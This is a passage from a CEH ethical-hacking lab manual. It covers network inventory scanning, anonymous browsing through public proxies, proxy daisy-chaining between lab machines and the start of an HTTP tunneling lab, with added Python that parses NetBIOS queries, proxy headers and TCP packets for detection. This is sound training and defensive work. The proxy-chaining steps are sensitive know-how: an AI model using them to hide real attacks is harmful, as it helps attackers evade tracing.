20. The Port connectors section shows the ports connected in the network.

Outgoing mail (SMTP): Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages.

FIGURE 11.19: Global Network Inventory Port connectors tab

21. The Services section gives the details of the services installed in the machine.


To create a new custom report that includes more than one scan element, choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, customize settings as desired, and click the OK button.

FIGURE 11.20: Global Network Inventory Services Section

22. The Network Adapters section shows the Adapter IP and Adapter type.
A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password.

FIGURE 11.21: Global Network Inventory Network Adapter tab

Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.


Tool/Utility: Global Network Inventory

Information Collected/Objectives Achieved:
IP Scan Range: 10.0.0.1 - 10.0.0.50
Scanned IP Addresses: 10.0.0.7, 10.0.0.4
Result:
■ Scan summary
■ Bios
■ Memory
■ NetBIOS
■ User Group
■ Logged On
■ Port connector
■ Services
■ Network Adapter

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Can Global Network Inventory audit remote computers and network appliances, and if yes, how?
2. How can you export the Global Network agent to a shared network directory?

Internet Connection Required
☐ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs


Anonymous Browsing using Proxy Switcher
Proxy Switcher allows you to automatically execute actions, based on the detected network connection.

ICON KEY
Valuable information
Test your knowledge
Web exercise
Workbook review

Lab Scenario
In the previous lab, you gathered information like scan summary, NetBIOS details, services running on a computer, etc. using Global Network Inventory. NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. A vulnerability has been identified in Microsoft Windows which involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, an attacker can find a computer's IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer's memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then looking carefully at the response to determine whether any random data from that computer's memory is included. As an expert penetration tester, you should follow typical security practices to block such Internet-based attacks: block port 137 User Datagram Protocol (UDP) at the firewall. You must also understand how networks are scanned using Proxy Switcher.
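The NetBT name service traffic described above, as an added example that is not part of the lab manual: a small Python parser for NBNS (UDP 137) query packets, written from the defender's side so that datagrams captured at the perimeter can be classified and node-status queries flagged. The packet layout follows RFC 1002; the packet builder exists only to construct the sample packets, and the host name WIN-ULY858KHQIP<20> is taken from the lab's scan results.

```python
"""
Added example, not part of the CEH lab manual: parse NetBIOS Name Service
(NBNS, UDP/137) query packets as laid out in RFC 1002, so a defender can
classify captured datagrams and flag the node-status (NBSTAT) queries the
scenario describes. All sample packets are constructed inline.
"""
import struct

NB_TYPE = 0x0020      # NB: name-to-address query
NBSTAT_TYPE = 0x0021  # NBSTAT: node status (adapter status) request
HEADER_LEN = 12       # NAME_TRN_ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT
QUERY_LEN = HEADER_LEN + 1 + 32 + 1 + 4   # one question section: 50 bytes


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """RFC 1002 first-level encoding: each nibble of the 16-byte name
    (15 characters plus the suffix byte) becomes the letter 'A' + nibble."""
    pad = b"\x00" if name == "*" else b" "   # the wildcard name is NUL-padded
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix & 0xFF])
    out = bytearray()
    for byte in raw:
        out += bytes((0x41 + (byte >> 4), 0x41 + (byte & 0x0F)))
    return bytes(out)


def decode_netbios_name(encoded: bytes) -> tuple:
    """Reverse the first-level encoding; returns (name, suffix)."""
    if len(encoded) != 32 or any(b < 0x41 or b > 0x50 for b in encoded):
        raise ValueError("invalid first-level encoded NetBIOS name")
    raw = bytes(((hi - 0x41) << 4) | (lo - 0x41)
                for hi, lo in zip(encoded[0::2], encoded[1::2]))
    name = raw[:15].decode("ascii", "replace").rstrip(" \x00")
    return name, raw[15]


def build_nbns_query(trn_id: int, name: str, qtype: int, suffix: int = 0x00) -> bytes:
    """Build a single-question NBNS query; used here only to construct samples."""
    # Name queries carry the RD and B (broadcast) flags; node-status queries carry none.
    flags = 0x0110 if qtype == NB_TYPE else 0x0000
    header = struct.pack("!6H", trn_id, flags, 1, 0, 0, 0)
    question = (b"\x20" + encode_netbios_name(name, suffix) + b"\x00"
                + struct.pack("!HH", qtype, 0x0001))
    return header + question


def parse_nbns_query(packet: bytes) -> dict:
    """Parse the header and the single question section of an NBNS packet."""
    if len(packet) < QUERY_LEN:
        raise ValueError("packet too short for an NBNS question")
    trn_id, flags, qdcount, _, _, _ = struct.unpack("!6H", packet[:HEADER_LEN])
    # One question, a 32-byte label (length 0x20) terminated by a zero byte
    if qdcount != 1 or packet[12] != 0x20 or packet[45] != 0x00:
        raise ValueError("unsupported question section layout")
    name, suffix = decode_netbios_name(packet[13:45])
    qtype, qclass = struct.unpack("!HH", packet[46:50])
    return {"trn_id": trn_id, "is_response": bool(flags & 0x8000),
            "opcode": (flags >> 11) & 0xF, "name": name, "suffix": suffix,
            "qtype": qtype, "qclass": qclass}


def classify_nbns_query(packet: bytes) -> str:
    """Label a datagram the way a UDP/137 monitor at the perimeter might."""
    q = parse_nbns_query(packet)
    if q["is_response"]:
        return "response"
    if q["qtype"] == NBSTAT_TYPE:
        # The '*' name asks the target for its whole NetBIOS name table
        target = "wildcard" if q["name"] == "*" else q["name"]
        return "node-status query (%s)" % target
    if q["qtype"] == NB_TYPE:
        return "name query for %s<%02X>" % (q["name"], q["suffix"])
    return "unknown qtype 0x%04X" % q["qtype"]


if __name__ == "__main__":
    # Constructed samples: a wildcard node-status probe and an ordinary name
    # query for the host WIN-ULY858KHQIP<20> seen in the lab's scan results.
    for pkt in (build_nbns_query(0x1234, "*", NBSTAT_TYPE),
                build_nbns_query(0x1235, "WIN-ULY858KHQIP", NB_TYPE, 0x20)):
        print(classify_nbns_query(pkt))
```

Datagrams that classify as node-status queries and arrive on UDP 137 from outside the local network are exactly the traffic the firewall rule in the scenario is meant to drop.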

Lab Objectives
This lab will show you how networks can be scanned and how to use Proxy Switcher. It will teach you how to:
■ Hide your IP address from the websites you visit
■ Use proxy server switching for improved anonymous surfing


Lab Environment
To carry out the lab, you need:
■ Proxy Switcher, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher
■ You can also download the latest version of Proxy Workbench from this link: http://www.proxyswitcher.com/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Switcher
■ Administrative privileges to run tools

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration
Time: 15 Minutes

Overview of Proxy Switcher
Proxy Switcher allows you to automatically execute actions, based on the detected network connection. As the name indicates, Proxy Switcher comes with some default actions, for example, setting proxy settings for Internet Explorer, Firefox, and Opera.

Lab Tasks
Automatic change of proxy configurations (or any other action) based on network information.

1. Install Proxy Workbench in Windows Server 2012 (Host Machine).
2. Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher.
3. Follow the wizard-driven installation steps and install it in all platforms of the Windows operating system.
4. This lab will work in the CEH lab environment - on Windows Server 2012, Windows Server 2008, and Windows 7.
5. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options in the menu bar.


Often different internet connections require completely different proxy server settings, and it's a real pain to change them manually.

FIGURE 12.1: Firefox options tab

6. Go to the Advanced profile in the Options wizard of Firefox, select the Network tab, and then click Settings.
Proxy Switcher is fully compatible with Internet Explorer, Firefox, Opera and other programs.

FIGURE 12.2: Firefox Network Settings

7. Select the Use system proxy settings radio button, and click OK.


Proxy Switcher supports the following command line option: -d: Activate direct connection.

FIGURE 12.3: Firefox Connection Settings

8. Now, to install Proxy Switcher Standard, follow the wizard-driven installation steps.
9. To launch Proxy Switcher Standard, go to the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

TASK 1: Proxy Servers Downloading

FIGURE 12.4: Windows Server 2012 - Desktop view

10. Click the Proxy Switcher Standard app to open the Proxy Switcher window, OR click Proxy Switcher from the Tray Icon list.


Proxy Switcher is free to use without limitations for personal and commercial use.

FIGURE 12.5: Windows Server 2012 - Apps

If the server becomes inaccessible, Proxy Switcher will try to find a working proxy server; a reddish background will be displayed till a working proxy server is found.

FIGURE 12.6: Select Proxy Switcher

11. The Proxy List Wizard will appear as shown in the following figure; click Next.


Proxy Switcher supports LAN, dialup, VPN and other RAS connections.

FIGURE 12.7: Proxy List wizard

12. Select the Find New Server, Rescan Server, Recheck Dead radio button from Common Tasks, and click Finish.

Proxy switching from the command line (can be used at logon to automatically set connection settings).

FIGURE 12.8: Select common tasks

13. A list of downloaded proxy servers will show in the left panel.


When Proxy Switcher is running in Keep Alive mode it tries to maintain a working proxy server connection by switching to a different proxy server if the current one dies.

FIGURE 12.9: List of downloaded Proxy Servers

14. To stop downloading the proxy servers, click Actions.

When the active proxy server becomes inaccessible, Proxy Switcher will pick a different server from the Proxy Switcher category. If the active proxy server is currently alive, the background will be green.

FIGURE 12.10: Click on Start button

15. Click Basic Anonymity in the right panel; it shows a list of downloaded proxy servers.

CEH Lab Manual Page 206

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Module 03 - Scanning Networks

When running in Auto Switch mode, Proxy Switcher will switch active proxy servers regularly. The switching period can be set with a slider from 5 minutes to 10 seconds.

[Figure 12.11 screenshot: Proxy Switcher server list under Basic Anonymity, with State (Alive-SSL), Response and Country columns]
FIGURE 12.11: Selecting downloaded Proxy server from Basic Anonymity

16. Select one proxy server IP address from the right panel to switch to the selected proxy server, and click the icon shown in the following figure.

In addition to the standard add/remove/edit functions, the proxy manager contains functions useful for anonymous surfing and proxy availability testing.

[Figure 12.12 screenshot: Proxy Switcher window with a server selected in the list and the connection test log below]
FIGURE 12.12: Selecting the proxy server

17. The selected proxy server will connect, and it will show the following connection icon.


[Figure 12.13 screenshot: Proxy Switcher window whose title now reads "Active Proxy: 95.110.159.54 - ITALY", with the server list and test log]
FIGURE 12.13: Successful connection of selected proxy

Starting from version 3.0, Proxy Switcher incorporates an internal proxy server. It is useful when you want to use other applications (besides Internet Explorer) that support an HTTP proxy via Proxy Switcher. By default it waits for connections on localhost:3128.

18. Go to a web browser (Firefox), and type the following URL: http://www.proxyswitcher.com/check.php to check the selected proxy server connectivity; if it is successfully connected, then it shows the following figure.
[Figure 12.14 screenshot: the check page in Mozilla Firefox reports "Your possible IP address is: 202.53.11.130, 192.168.1.1", Location: Unknown; Proxy Information: Proxy Server: DETECTED, Proxy IP: 95.110.159.67, Proxy Country: Unknown]
FIGURE 12.14: Detected Proxy server
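The check page in Figure 12.14 can only report "possible IP addresses" because a forwarding proxy adds headers that name the hosts behind it. As an added example (not the lab's or Proxy Switcher's code), the following Python does the same analysis from the web server's side and grades the proxy the way proxy lists do: the sample addresses are the ones shown in the figure, the Via host name is a constructed placeholder.

```python
"""Server-side proxy detection: recover the apparent client addresses from
the headers a forwarding proxy adds (RFC 7230 Via, RFC 7239 Forwarded, the
de-facto X-Forwarded-For, Proxy-Connection) and classify the proxy."""
import ipaddress

# Headers whose presence at the origin server betrays a proxy in the path.
PROXY_TELLTALES = ("via", "x-forwarded-for", "forwarded", "x-real-ip",
                   "proxy-connection")
# RFC 1918 / loopback / ULA ranges: a leak of these exposes internal topology.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "fc00::/7", "::1/128")]


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (request_line, headers).
    Header names are lower-cased; repeated headers are kept in order."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def _as_ip(token):
    """ip, "ip", [v6]:port or v4:port -> ip_address; None for 'unknown' etc."""
    tok = token.strip().strip('"')
    if tok.startswith("["):                 # RFC 7239 bracketed IPv6
        tok = tok[1:].split("]", 1)[0]
    elif tok.count(":") == 1:               # IPv4 with a port suffix
        tok = tok.split(":", 1)[0]
    try:
        return ipaddress.ip_address(tok)
    except ValueError:
        return None


def forwarded_chain(headers):
    """Client addresses asserted by X-Forwarded-For and Forwarded, in order."""
    chain = []
    for value in headers.get("x-forwarded-for", []):
        chain += [ip for ip in map(_as_ip, value.split(",")) if ip]
    for value in headers.get("forwarded", []):
        for element in value.split(","):
            for pair in element.split(";"):
                key, _, val = pair.strip().partition("=")
                ip = _as_ip(val) if key.lower() == "for" else None
                if ip:
                    chain.append(ip)
    return chain


def analyze(raw_request, peer_ip):
    """Grade the proxy between peer_ip (the TCP peer we see) and this server.
    transparent: the client's own address is forwarded (fully traceable);
    anonymous:   proxy headers are present but no client address is given;
    elite:       nothing in the request distinguishes it from a direct hit."""
    _, headers = parse_request(raw_request)
    peer = ipaddress.ip_address(peer_ip)
    leaked = [ip for ip in forwarded_chain(headers) if ip != peer]
    if leaked:
        level = "transparent"
    elif any(h in headers for h in PROXY_TELLTALES):
        level = "anonymous"
    else:
        level = "elite"
    return {
        "level": level,
        "proxy_detected": level != "elite",
        # What the check page prints as "Your possible IP address is: ..."
        "possible_client_ips": [str(ip) for ip in leaked] or [peer_ip],
        "internal_leaked": [str(ip) for ip in leaked
                            if any(ip in net for net in INTERNAL_NETS)],
        "via": headers.get("via", []),
    }


# Constructed requests as the origin server receives them from the proxy.
SAMPLE_TRANSPARENT = (
    "GET /check.php HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "X-Forwarded-For: 192.168.1.1, 202.53.11.130\r\n"
    "Via: 1.1 proxy.example.test:3128\r\n"      # placeholder proxy name
    "Proxy-Connection: keep-alive\r\n"
    "\r\n")
SAMPLE_ANONYMOUS = ("GET /check.php HTTP/1.1\r\nHost: www.example.test\r\n"
                    "Via: 1.1 proxy.example.test:3128\r\n\r\n")
SAMPLE_ELITE = "GET /check.php HTTP/1.1\r\nHost: www.example.test\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("transparent", SAMPLE_TRANSPARENT),
                      ("anonymous", SAMPLE_ANONYMOUS), ("elite", SAMPLE_ELITE)):
        print(name, analyze(req, "95.110.159.67"))   # peer = the proxy's IP
```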

19. Open another tab in the web browser, and surf anonymously using this proxy server.

After the anonymous proxy servers have become available for switching, you can activate any one of them to become invisible to the sites you visit.

[Figure 12.14 screenshot: Google search results for "proxy server" in Mozilla Firefox, served from google.it in Italian through the selected proxy]
FIGURE 12.14: Surf using Proxy server

Lab Analysis

Document all the IP addresses of live (SSL) proxy servers and the connectivity you discovered during the lab.

Tool/Utility: Proxy Switcher
Information Collected/Objectives Achieved:
■ Server: List of available proxy servers
■ Selected Proxy Server IP Address: 95.110.159.54
■ Selected Proxy Country Name: ITALY
■ Resulted Proxy server IP Address: 95.110.159.67

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Examine which technologies are used for Proxy Switcher.
2. Evaluate why Proxy Switcher is not open source.


Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs


Lab 3

Daisy Chaining using Proxy Workbench

Proxy Workbench is a unique proxy server, ideal for developers, security experts, and trainers, which displays data in real time.
ICON KEY: Valuable information; Test your knowledge; Web exercise; Workbook review

Lab Scenario

You have learned in the previous lab how to hide your actual IP and browse anonymously using a Proxy Switcher. Similarly, an attacker with malicious intent can pose as someone else by using a proxy server to gather information like the bank account details of an individual, or to perform social engineering. Once the attacker gains the relevant information online, he or she can hack into that individual's bank account for shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace the real source of attacks. As an administrator, you should be able to prevent such attacks by deploying an intrusion detection system with which you can collect network information for analysis to determine if an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned.

Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Workbench. It will teach you how to:
■ Use the Proxy Workbench tool
■ Daisy chain the Windows Host Machine and Virtual Machines

Lab Environment

To carry out the lab, you need:
■ Proxy Workbench is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench


■ You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as attacker (host machine)
■ Another computer running Windows Server 2008 and Windows 7 as victim (virtual machine)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Workbench
■ Administrative privileges to run tools

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 20 Minutes

Overview of Proxy Workbench

Proxy Workbench is a proxy server that displays its data in real time. It shows the data flowing between the web browser and the web server, and even analyzes FTP in passive and active modes.

Lab Tasks

Install Proxy Workbench on all platforms of the Windows operating system (Windows Server 2012, Windows Server 2008, and Windows 7)

Proxy Workbench is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench. You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com

Security: Proxy servers provide a level of security within a network. They can help prevent security attacks, as the only way into the network from the Internet is via the proxy server.

4. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system (Windows Server 2012, Windows Server 2008, and Windows 7).
5. This lab will work in the CEH lab environment on Windows Server 2012, Windows Server 2008, and Windows 7.
6. Open the Firefox browser in your Windows Server 2012, click Tools, and go to Options.


[Figure 13.1 screenshot: Google home page in Mozilla Firefox with the Tools menu open, showing the Options entry]
FIGURE 13.1: Firefox options tab

7. Go to the Options wizard of Firefox, select the Advanced profile, and in the Network tab click Settings.
The sockets panel shows the number of Alive socket connections that Proxy Workbench is managing. During periods of no activity this will drop back to zero.

[Figure 13.2 screenshot: Firefox Options, Advanced > Network tab, with "Configure how Firefox connects to the Internet" and its Settings button, plus the Cached Web Content and Offline Web Content and User Data sections]
FIGURE 13.2: Firefox Network Settings


The status bar shows the details of Proxy Workbench's activity. The first panel displays the amount of data Proxy Workbench currently has in memory. The actual amount of memory that Proxy Workbench is consuming is generally much more than this, due to the overhead of managing it.

8. Check Manual proxy configuration in the Connection Settings wizard.
9. Type the HTTP Proxy as 127.0.0.1 and enter the port value as 8080, check the option Use this proxy server for all protocols, and click OK.

[Figure 13.3 screenshot: Firefox Connection Settings, Manual proxy configuration: HTTP Proxy 127.0.0.1 Port 8080, "Use this proxy server for all protocols" checked (SSL, FTP and SOCKS host 127.0.0.1 port 8080, SOCKS v5), No Proxy for: localhost, 127.0.0.1]
FIGURE 13.3: Firefox Connection Settings

10. While configuring, if you encounter any port error, please ignore it.
11. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.

[Figure 13.4 screenshot: Windows Server 2012 desktop]
FIGURE 13.4: Windows Server 2012 - Desktop view

12. Click the Proxy Workbench app to open the Proxy Workbench window.


The events panel displays the total number of events that Proxy Workbench has in memory. By clearing the data (File -> Clear All Data) this will decrease to zero if there are no connections that are Alive.

[Figure 13.5 screenshot: Windows Server 2012 Apps screen, including Server Manager, Windows PowerShell, Google Chrome, Hyper-V Manager, Control Panel, SQL Server, Command Prompt, Firefox, Global Network Inventory and Proxy Workbench]
FIGURE 13.5: Windows Server 2012 - Apps

13. The Proxy Workbench main window appears as shown in the following figure.

The last panel displays the current time as reported by your operating system.

[Figure 13.6 screenshot: Proxy Workbench main window. The Monitoring tree lists the listeners SMTP - Outgoing e-mail (25), POP3 - Incoming e-mail (110), HTTP Proxy - Web (8080), HTTPS Proxy - Secure Web (443), FTP - File Transfer Protocol (21) and Pass Through - For Testing Apps (1000). "Details for All Activity" shows From (127.0.0.1:51199, 127.0.0.1:51201, ...), To (173.194.36.24:80, 74.125.31.106:80, 173.194.36.21:443, ...), Protocol (HTTP) and Started columns. "Real time data for All Activity" shows a hex/ASCII dump of a request carrying User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1, Proxy-Connection: keep-alive and Host: mail.google.com. Status bar: Memory: 95 KByte, Sockets: 100, Events: 754]
FIGURE 13.6: Proxy Workbench main window

14. Go to Tools on the toolbar, and select Configure Ports.


The "Show the real time data window" option allows the user to specify whether the real-time data pane should be displayed or not.

[Figure 13.7 screenshot: Proxy Workbench with the Tools menu open, listing Save Data..., Configure Ports..., Failure Simulation..., Real Time Logging and Options...]
FIGURE 13.7: Proxy Workbench Configure Ports option

15. In the Configure Proxy Workbench wizard, select 8080 HTTP Proxy - Web in the left pane of Ports to listen on.
16. Check HTTP in the right pane of Protocol assigned to port 8080, and click Configure HTTP for port 8080.

People who benefit from Proxy Workbench: Home users who have taken the first step in understanding the Internet and are starting to ask "But how does it work?" People who are curious about how their web browser, email client or FTP client communicates with the Internet. People who are concerned about malicious programs sending sensitive information out into the Internet; the information that programs are sending can be readily identified. Internet software developers who are writing programs to existing protocols; software development for the Internet is often very complex, especially when a program is not properly adhering to a protocol, and Proxy Workbench allows developers to instantly identify protocol problems. Internet software developers who are creating new protocols and developing the client and server software simultaneously; Proxy Workbench will help identify a non-compliant protocol. Internet security experts will benefit from seeing the data flowing in real time; this will help them see who is doing what and when.

[Figure 13.8 screenshot: Configure Proxy Workbench dialog. Ports to listen on: 25 SMTP - Outgoing e-mail, 110 POP3 - Incoming e-mail, 8080 HTTP Proxy - Web, 443 HTTPS Proxy - Secure Web, 21 FTP - File Transfer Protocol, 1000 Pass Through - For Testing Apps. Protocol assigned to port 8080: Don't use / Pass Through / HTTP (checked) / HTTPS / POP3 / FTP. Buttons: Add, Delete, Configure HTTP for port 8080, Close; "Show this screen at startup" checked]
FIGURE 13.8: Proxy Workbench Configuring HTTP for Port 8080

17. The HTTP Properties window appears. Now check Connect via another proxy, enter your Windows Server 2003 virtual machine IP address in Proxy Server, enter 8080 in Port, and then click OK.


Many people understand sockets much better than they think. When you surf the web and go to a website called www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altavista.com" with port number 80.

[Figure 13.9 screenshot: HTTP Properties dialog, General tab, with "Connect via another proxy" selected, Proxy server 10.0.0.7, Port 8080]
FIGURE 13.9: Proxy Workbench HTTP for Port 8080

18. Click Close in the Configure Proxy Workbench wizard after completing the configuration settings.

The real time logging allows you to record everything Proxy Workbench does to a text file. This allows the information to be readily imported into a spreadsheet or database so that the most advanced analysis can be performed on the data.

[Figure 13.10 screenshot: Configure Proxy Workbench dialog after configuration, with HTTP assigned to port 8080 and the Close button]
FIGURE 13.10: Proxy Workbench Configured proxy

19. Repeat the configuration steps of Proxy Workbench from Step 11 to Step 15 in the Windows Server 2008 Virtual Machines.


20. In Windows Server 2008, type the IP address of the Windows 7 Virtual Machine.
21. Open a Firefox browser in Windows Server 2008 and browse web pages.
22. Proxy Workbench generates the traffic as shown in the following figure of Windows Server 2008.
23. Check the To column; it is forwarding the traffic to 10.0.0.3 (Windows Server 2008 virtual Machine).

Proxy Workbench changes this. Not only is it an awesome proxy server, but you can see all of the data flowing through it, visually display a socket connection history and save it to HTML.

[Figure 13.11 screenshot: Proxy Workbench on the Windows Server 2012 host, showing HTTP connections in the Details pane and the hex/ASCII dump of a request in the real-time data pane]
FIGURE 13.11: Proxy Workbench Generated Traffic in Windows Server 2012 Host Machine

24. Now log in to the Windows Server 2008 Virtual Machine, and check the To column; it is forwarding the traffic to 10.0.0.7 (Windows 7 Virtual Machine).

And now, Proxy Workbench includes connection failure simulation strategies. What this means is that you can simulate a poor network, a slow Internet or an unresponsive server. This makes it the definitive TCP application tester.

[Figure 13.12 screenshot: Proxy Workbench on the virtual machine, Monitoring 10.0.0.3, with HTTP connections whose To column reads 10.0.0.7:8080 in the Details pane and a hex/ASCII dump of an HTTP response in the real-time data pane]
FIGURE 13.12: Proxy Workbench Generated Traffic in Windows Server 2003 Virtual Machine


25. In the Windows 7 virtual machine, select On the web server, connect to port 80, and click OK.

It allows you to 'see' how your email client communicates with the email server, how web pages are delivered to your browser and why your FTP client is not connecting to its server.

FIGURE 13.13: Configuring HTTP properties in Windows 7

26. Now check the traffic in 10.0.0.7 (Windows 7 Virtual Machine); the "TO" column shows traffic generated from the different websites browsed in Windows Server 2008.

In the Connection Tree, if a protocol or a client/server pair is selected, the Details Pane displays the summary information of all of the socket connections that are in progress for the selected item on the Connection Tree.

FIGURE 13.14: Proxy Workbench Generated Traffic in Windows 7 Virtual Machine

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.


Tool/Utility: Proxy Workbench
Information Collected/Objectives Achieved: Proxy server used: 10.0.0.7; Port scanned: 8080; Result: Traffic captured by Windows 7 virtual machine (10.0.0.7)

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Examine the Connection Failure - Termination and Refusal.
2. Evaluate how real-time logging records everything in Proxy Workbench.

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom, iLabs


HTTP Tunneling Using HTTPort

HTTPort is a program from HTTHost that makes a transparent tunnel through a proxy server or firewall.

Lab Scenario

ICON KEY: Valuable information, Test your knowledge, Web exercise, Workbook review

Attackers are always on the hunt for clients that can be easily compromised to damage or steal data. They can enter these networks with IP spoofing attacks by spoofing the IP address. If the attackers are able to capture network traffic, as you have learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, etc., which can prove disastrous for an organization's network. An attacker may use a network probe to capture raw packet data and then use this raw packet data to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TTL), and protocol type. Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic such as source and destination IP addresses, protocol type, header length, source and destination ports, etc., and compare these details with modeled attack signatures to determine if an attack has occurred. You can also check the attack logs for the list of attacks and take evasive actions. Also, you should be familiar with the HTTP tunneling technique, by which you can identify additional security risks that may not be readily visible by conducting simple network and vulnerability scanning, and determine the extent to which a network IDS can identify malicious traffic within a communication channel. In this lab you will learn HTTP Tunneling using HTTPort.
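The field extraction and signature comparison described above, carried out on a raw packet. This Python is an added example for this lab, not code from the manual or from HTTPort/HTTHost; the packet bytes, the 10.0.0.x addresses and the two signatures (one of them keyed on the SOCKS port 1080 that HTTPort exposes) are constructed for the demonstration.

```python
import struct
from typing import Dict, List

# Added example for this lab (not code from the CEH manual or from HTTPort):
# pull the header fields the scenario lists out of a raw IPv4/TCP packet,
# verify the IPv4 header checksum, and compare the result against a small
# set of constructed "attack signatures". The packet bytes are built below
# for the demonstration; the addresses reuse the lab's 10.0.0.x range.

TCP_FLAG_NAMES = ["FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR"]


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 checksum: one's-complement sum of the 16-bit header words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(packet: bytes) -> Dict[str, object]:
    """Extract IPv4 (and, for protocol 6, TCP) header fields from raw bytes."""
    if len(packet) < 20:
        raise ValueError("packet shorter than a minimal IPv4 header")
    (ver_ihl, _tos, total_len, _ident, frag, ttl, proto,
     csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < 20 or len(packet) < ihl:
        raise ValueError("not a well-formed IPv4 header")
    # Recompute the checksum over the header with the checksum field zeroed.
    hdr = bytearray(packet[:ihl])
    hdr[10:12] = b"\x00\x00"
    info: Dict[str, object] = {
        "src_ip": ".".join(str(b) for b in src),
        "dst_ip": ".".join(str(b) for b in dst),
        "ip_header_len": ihl,
        "total_len": total_len,
        "ttl": ttl,
        "protocol": proto,
        "ip_checksum": csum,
        "ip_checksum_ok": ipv4_checksum(bytes(hdr)) == csum,
        "dont_fragment": bool(frag & 0x4000),
        "more_fragments": bool(frag & 0x2000),
    }
    if proto != 6:  # only TCP is decoded further in this example
        return info
    if len(packet) < ihl + 20:
        raise ValueError("truncated TCP header")
    (sport, dport, seq, ack, off_flags, window,
     tcp_csum, _urg) = struct.unpack("!HHIIHHHH", packet[ihl:ihl + 20])
    flag_bits = off_flags & 0x01FF
    info.update({
        "src_port": sport,
        "dst_port": dport,
        "tcp_header_len": (off_flags >> 12) * 4,
        "flags": [n for i, n in enumerate(TCP_FLAG_NAMES) if flag_bits & (1 << i)],
        "tcp_checksum": tcp_csum,
        "seq": seq,
        "ack": ack,
        "window": window,
    })
    return info


# Constructed signatures: a packet matches when every listed field is equal.
SIGNATURES = {
    # a bare SYN towards the SOCKS port HTTPort exposes (1080)
    "tcp-syn-to-socks-1080": {"protocol": 6, "dst_port": 1080, "flags": ["SYN"]},
    # SYN and FIN set together never occur in a legitimate handshake
    "tcp-syn-fin": {"protocol": 6, "flags": ["FIN", "SYN"]},
}


def match_signatures(info: Dict[str, object], signatures=SIGNATURES) -> List[str]:
    """Names of the signatures whose fields all agree with the parsed packet."""
    return [name for name, sig in signatures.items()
            if all(info.get(k) == v for k, v in sig.items())]


def build_sample_packet(dst_port: int = 80, flags: int = 0x002, ttl: int = 128) -> bytes:
    """Constructed IPv4/TCP packet from 10.0.0.7:49152 to 10.0.0.4:<dst_port>."""
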